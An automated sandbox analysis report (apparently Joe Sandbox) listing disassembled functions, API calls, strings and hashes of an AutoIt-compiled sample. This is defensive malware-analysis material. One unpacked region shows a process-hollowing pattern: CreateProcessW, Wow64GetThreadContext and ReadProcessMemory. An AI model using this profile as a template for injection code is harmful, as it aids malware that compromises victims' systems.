Part of subcall function 00600162: MapVirtualKeyW.USER32(00000011,00000000), ref: 006001B9
Part of subcall function 00600162: MapVirtualKeyW.USER32(00000012,00000000), ref: 006001C1

Part of subcall function 005F60F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,005EF930), ref: 005F6154

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 005EF9CD
OleInitialize.OLE32(00000000), ref: 005EFA4A
CloseHandle.KERNEL32(00000000), ref: 006245C8

Strings

Sj, xrefs: 005EF7EB
\Tj, xrefs: 005EF7F7
%g, xrefs: 005EF796, 005EF7A8, 005EF96E, 005EFA51
<Wj, xrefs: 005EF930

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID: <Wj$\Tj$%g$Sj
API String ID: 1986988660-768820286
Opcode ID: 7fa51126b422d910b392c08d64b69809acd2acad8d6643958217a897aa783fd6
Instruction ID: 279e8016212c20be878acbdc7b9fe18ebebff5a1f53482d7dec8c0fb9bf61f51
Opcode Fuzzy Hash: 7fa51126b422d910b392c08d64b69809acd2acad8d6643958217a897aa783fd6
Instruction Fuzzy Hash: 3381BCB0905A41DF8784FF79A8446197FE7FB9F306750A12AD01BCB272EB7468848F61

Function 0118A448 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 0118A519
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0118A73F

Memory Dump Source

Source File: 00000000.00000002.2153550705.0000000001187000.00000040.00000020.00020000.00000000.sdmp, Offset: 01187000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1187000_C5JLkBS1CX.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
Instruction ID: 008d2516da8535309bd7fb221bf914a42b9ec334e4b5027568eeeef2940f758e
Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
Instruction Fuzzy Hash: 30A11A74E00209EBDB18DFA4D894BEEBBB5FF48304F208159E601BB285D7759A81CF65

Function 005E39D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 005E3A03
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 005E3A24
ShowWindow.USER32(00000000,?,?), ref: 005E3A38
ShowWindow.USER32(00000000,?,?), ref: 005E3A41

Strings

AutoIt v3, xrefs: 005E39FB, 005E3A00, 005E3A01
edit, xrefs: 005E3A1E

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: d6166882f294d6af8327ad71aa62c868466e3501d33968eae3955e0870a6b84a
Instruction ID: 86436d60fcff803853bcadf9b2e500152112f167aad624fbebf09881df0cf779
Opcode Fuzzy Hash: d6166882f294d6af8327ad71aa62c868466e3501d33968eae3955e0870a6b84a
Instruction Fuzzy Hash: AAF03A70500290BEEB30AB237C08F2B3E7FD7C7F50B00212ABA01A2170C6612800DEB0

Function 0118A228 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 142
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0118A118: Sleep.KERNELBASE(000001F4), ref: 0118A129

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0118A33F

Strings

EJXZ45JPELLAJY5WK1, xrefs: 0118A3A2, 0118A3A5

Memory Dump Source

Source File: 00000000.00000002.2153550705.0000000001187000.00000040.00000020.00020000.00000000.sdmp, Offset: 01187000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1187000_C5JLkBS1CX.jbxd

Similarity

API ID: CreateFileSleep
String ID: EJXZ45JPELLAJY5WK1
API String ID: 2694422964-2784102964
Opcode ID: cd4b6f48fec8d8e7cb7345310d1468086a0a71965e64a2eab1d1b1192120f674
Instruction ID: b149087c66872da344adf416a72bee57085d9bdb5d77f54819a759f8b1d222a5
Opcode Fuzzy Hash: cd4b6f48fec8d8e7cb7345310d1468086a0a71965e64a2eab1d1b1192120f674
Instruction Fuzzy Hash: 6751A570D04249DBEF15DBA4D818BEEBB74AF15304F048199E608BB2C1D7B91B49CB66

Function 005E407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0061D3D7

Part of subcall function 005E7BCC: _memmove.LIBCMT ref: 005E7C06

_memset.LIBCMT ref: 005E40FC
_wcscpy.LIBCMT ref: 005E4150
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 005E4160

Strings

Line: , xrefs: 0061D400

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: 893bb43097fe6bc164fcd0773caac63b38991960291fe0388bde1c75444bb63b
Instruction ID: cb3707a3d4e6f877b2e2637f3142266504ec74cd72b2614bf7f596ad84a306c2
Opcode Fuzzy Hash: 893bb43097fe6bc164fcd0773caac63b38991960291fe0388bde1c75444bb63b
Instruction Fuzzy Hash: 0231B071008786AED729EB61DC49BDB7BDDBF95310F10491AF5C692091EB70AA48CB82

Function 0060541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0060547B
_memcpy_s.LIBCMT ref: 006054ED
__read_nolock.LIBCMT ref: 0060554B
__filbuf.LIBCMT ref: 0060556E
_memset.LIBCMT ref: 006055B2

Part of subcall function 00608B28: __getptd_noexit.LIBCMT ref: 00608B28

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
Instruction ID: 5014e501365226988853dce76d0aaa20beb7a77d3e4d93f8aa1afe49a648f34c
Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
Instruction Fuzzy Hash: 8251AF70A80B059BDB2D9EA9DC806EF77A7AF40321F248729F826962D1D7709D918F40

Function 005E686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 005E4DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,006A52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 005E4E0F

_free.LIBCMT ref: 0061E263
_free.LIBCMT ref: 0061E2AA

Part of subcall function 005E6A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 005E6BAD

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 0061E039
Bad directive syntax error, xrefs: 0061E292

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: 5144915b27cf8778f3163d71f391047b0c8c71d9ab1cb0dfb3511cc3cb3625cd
Instruction ID: 2c1ce855b00960a05cf30114b964cadc308d8c25378c2c8c018580f425500d00
Opcode Fuzzy Hash: 5144915b27cf8778f3163d71f391047b0c8c71d9ab1cb0dfb3511cc3cb3625cd
Instruction Fuzzy Hash: 1B919F7190025AAFCF08DFA4CC559EDBBBAFF18310F144429F815AB2A1DB71AE55CB50

Function 005E35B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,005E35A1,SwapMouseButtons,00000004,?), ref: 005E35D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,005E35A1,SwapMouseButtons,00000004,?,?,?,?,005E2754), ref: 005E35F5
RegCloseKey.KERNELBASE(00000000,?,?,005E35A1,SwapMouseButtons,00000004,?,?,?,?,005E2754), ref: 005E3617

Strings

Control Panel\Mouse, xrefs: 005E35D2

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 0628498d27eec9c256ba2700b1771e33c6aa125f58db0b061dac989cf53e0ff0
Instruction ID: 7e40c5cb043039eb0bdc9d0fbb2d87b4a524f6c0fcc80c8526a4534aedbc38b8
Opcode Fuzzy Hash: 0628498d27eec9c256ba2700b1771e33c6aa125f58db0b061dac989cf53e0ff0
Instruction Fuzzy Hash: E6114871510248BFDB24CFA5EC489AEBBB9FF05740F016469E845D7210D2719E409760

Function 01189118 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 01189945
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01189969
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0118998B
TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 01189C94

Memory Dump Source

Source File: 00000000.00000002.2153550705.0000000001187000.00000040.00000020.00020000.00000000.sdmp, Offset: 01187000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1187000_C5JLkBS1CX.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadTerminateThreadWow64
String ID:
API String ID: 572931308-0
Opcode ID: 766b881ec6164bc259338bbbecc08836d97cc5066010a81dd887eea552f5ff52
Instruction ID: 6061534a38d553999238503d2611a5b86b66b7e4d1688d4b0fc54a10e41d4d2b
Opcode Fuzzy Hash: 766b881ec6164bc259338bbbecc08836d97cc5066010a81dd887eea552f5ff52
Instruction Fuzzy Hash: D662FE30A142589BEB24DFA4C840BEEB775EF58304F1091A9D10DEB394E7769E81CF59

Function 0064955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 005E4EE5: _fseek.LIBCMT ref: 005E4EFD

Part of subcall function 00649734: _wcscmp.LIBCMT ref: 00649824
Part of subcall function 00649734: _wcscmp.LIBCMT ref: 00649837

_free.LIBCMT ref: 006496A2
_free.LIBCMT ref: 006496A9
_free.LIBCMT ref: 00649714

Part of subcall function 00602D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00609A24), ref: 00602D69
Part of subcall function 00602D55: GetLastError.KERNEL32(00000000,?,00609A24), ref: 00602D7B

_free.LIBCMT ref: 0064971C

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
Instruction ID: 6ce467d6dfa3f3293eeea77c5d184d6fcff22095d02e9820e900bfa574007c14
Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
Instruction Fuzzy Hash: 99515FB1944259AFDF289F65DC85AAEBB7AFF48300F10449EF249A3341DB715A80CF58

Function 0060470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 006047A0
__flush.LIBCMT ref: 006047C0
__write.LIBCMT ref: 006047F3
__flsbuf.LIBCMT ref: 00604821

Part of subcall function 00608B28: __getptd_noexit.LIBCMT ref: 00608B28

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction ID: d12441c460293979d212e6df83b4a29128627cd4496080ef44aae9d305de149e
Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction Fuzzy Hash: 1F41B3B4A407459BDB3C8E69C8809AB77A7AF85360B24C57DEA15876C0EF70DD418B40

Function 005E44A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 005E44CF

Part of subcall function 005E407C: _memset.LIBCMT ref: 005E40FC
Part of subcall function 005E407C: _wcscpy.LIBCMT ref: 005E4150
Part of subcall function 005E407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 005E4160

KillTimer.USER32(?,00000001,?,?), ref: 005E4524
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 005E4533
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0061D4B9

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 063ebc0b4788879ea1355f640afd894eb2c0953eb4b4316cfcb1906605f25d7e
Instruction ID: 787b6f6a5c574eadac8fb0ce60d360521f3e0ac9b9e5eeda78822664de9cb6b0
Opcode Fuzzy Hash: 063ebc0b4788879ea1355f640afd894eb2c0953eb4b4316cfcb1906605f25d7e
Instruction Fuzzy Hash: 4821D770504784AFE732DB249859BEBBFEDAF05314F08149EE6DE56281C3742A84CB51

Function 005E4C70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 005E4CBA

Strings

AU3!P/g, xrefs: 005E4CB4
EA06, xrefs: 0061D8CC

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: _memmove
String ID: AU3!P/g$EA06
API String ID: 4104443479-1337525066
Opcode ID: d3d54955a12f728e60af284206fb31433384010381891c0b766c98b21ca2d160
Instruction ID: 93def59def3cabe8331c6699b30bc10e47742ed5a8517570803d503f0b356d13
Opcode Fuzzy Hash: d3d54955a12f728e60af284206fb31433384010381891c0b766c98b21ca2d160
Instruction Fuzzy Hash: DC419C21A002D85BDF2D9F568D557FE7FA6BB85300F284464ECC29B282D6209D448BA2

Function 005E7285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0061EA39
GetOpenFileNameW.COMDLG32(?), ref: 0061EA83

Part of subcall function 005E4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,005E4743,?,?,005E37AE,?), ref: 005E4770

Part of subcall function 00600791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006007B0

Strings

X, xrefs: 0061EA51

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: 10b8ef571162adadcd2e26ac4c7942b386faeaf307a3b6829e52ca8f671b41ea
Instruction ID: fed385e795b7f20474eb01a37c5989b2a71302eb989c4c6865c311fb279d37f0
Opcode Fuzzy Hash: 10b8ef571162adadcd2e26ac4c7942b386faeaf307a3b6829e52ca8f671b41ea
Instruction Fuzzy Hash: 6A210530A002899FCF45DF94C849BEE7FFEAF49300F044019E548AB281DBF55A898FA1

Function 00648D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00648DAC
__fread_nolock.LIBCMT ref: 00648DC1

Strings

EA06, xrefs: 00648DF3

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: 4105c05b2ed88ee442ddc239f27c09d4153962a12f5ecc93da7f6b7bd5279b7b
Instruction ID: 41adbe034500c071fd31b9cf0dfe60fb830e2aa27ceb0c1e63858475045fcc2c
Opcode Fuzzy Hash: 4105c05b2ed88ee442ddc239f27c09d4153962a12f5ecc93da7f6b7bd5279b7b
Instruction Fuzzy Hash: A301F971C442187EDB58CBA8CC16EEE7BFCDF11301F00419EF552D21C1E875A6048B60

Function 006498E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 006498F8
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0064990F

Strings

aut, xrefs: 00649909

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: e709d709c5dc2a11c339784ab262a35101692d00592a248ca652774dd9c2cadd
Instruction ID: 66de73a543edf4f29019ce7ad84c9089b4394488c9825311572f0df974ecbd6d
Opcode Fuzzy Hash: e709d709c5dc2a11c339784ab262a35101692d00592a248ca652774dd9c2cadd
Instruction Fuzzy Hash: 1DD05E7954030DABDB509BE0EC0EF9A773DE704704F0002B1FA54920A1EAB096988FA1

Function 0065CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 464157dae277504031b1709dd6847f08ae52bee3f3d60ce6bf8d5f01e8bc73a6
Instruction ID: 87459a72fc6fa97bda4d872d7d0d72f278dce74520b8bf578b640913cd1eca58
Opcode Fuzzy Hash: 464157dae277504031b1709dd6847f08ae52bee3f3d60ce6bf8d5f01e8bc73a6
Instruction Fuzzy Hash: C3F129716083419FCB14DF29C485A6ABBE6FF88324F14892EF8999B351D730E945CF82

Function 005E434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 005E4370
Shell_NotifyIconW.SHELL32(00000000,?), ref: 005E4415
Shell_NotifyIconW.SHELL32(00000001,?), ref: 005E4432

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: f91d6b13f4b877ac37d72729065a600d5af6029d064c749702c334e82a461f24
Instruction ID: 77382784bf9a79b632a1ad969229290b61ace037b2fb860eaa8367fa4643ca17
Opcode Fuzzy Hash: f91d6b13f4b877ac37d72729065a600d5af6029d064c749702c334e82a461f24
Instruction Fuzzy Hash: 13318FB05047419FC765EF25D88479BBBF9FB49308F000D2EE6DA82291E770AA84CF52

Function 0060571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00605733

Part of subcall function 0060A16B: __NMSG_WRITE.LIBCMT ref: 0060A192
Part of subcall function 0060A16B: __NMSG_WRITE.LIBCMT ref: 0060A19C

